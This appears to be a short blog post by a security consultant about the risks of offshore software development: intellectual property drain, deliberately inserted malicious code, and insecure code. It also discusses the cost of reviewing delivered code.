I have been looking at a number of security issues related to offshore development as of late. Basically then tend to fall in a few broad categories:
- Intellectual Property drain – I have heard it said: “If you want to keep a secret – don’t tell nobody” Well, sending specs for business-critical software overseas to be implemented in a foreign country with a radically different legal system and cultural appreciation for intellectual property probably qualifies as “telling somebody.” This was less of an issue when the work going overseas was Y2K COBOL maintenance, but these days there is really innovative stuff being implemented all around the world the risk is far greater. Google can give you some recommendations about best practices for offshore development, but at the end of the day moving development offshore drastically increases the risk that the confidentiality of your information will be compromised.
- Malicious code – This is the threat that offshore developers intentially insert malicious code into the software that is delivered. Malicious code could be anything from time bombs set to go off if future contract negoations do not go well, code that siphons off customers data or even system-level backdoors. Slashdot had an article today about the US government investigating Lenovo. This wasn’t specifically offshore software-related, but does speak to concerns about having information technology goods produced offshore. The “good” news here is that at least organizations have a chance to review the code before it goes into productions (hopefully). The “bad” news here is that reviewing code to find these sorts of defects is extremely time consuming and requires well trained individuals. In cases such as this it isn’t a matter of finding technical flaws such as SQL injection or Cross-Site Scripting problems that automated code scanners can find. This requires a line-by-line search for logical flaws in the application that result in a compromise. Malicious code in offshore-developed software is especially scary because it brings into question the confidentiality, integrity and availability of any systems brought online based on the code.
- Insecure code – If US developers can make mistakes, so can offshore developers. US-based software development organizations are bad enough at designing and implementing reasonably secure applications. If offshore organizations are trying to solicit customers primarily based on price, security will be the first concern to go out the window. In my experience, I have seen this become an issue time and time again when organizations with little in-house technical expertise try to develop software offshore. They simply don’t know what to ask for. Even organization that are technically sophisticated do not make this a priority. If you ask for security you might not get it – if you don’t ask for security you certainly won’t get it.
Offshoring software development can significantly reduce the costs of developing applications. However, organizations need to take into account the costs of certifying the deliverables that come back as well as the indirect costs from the security risks associated with offshore development.
dan _at_ denimgroup.com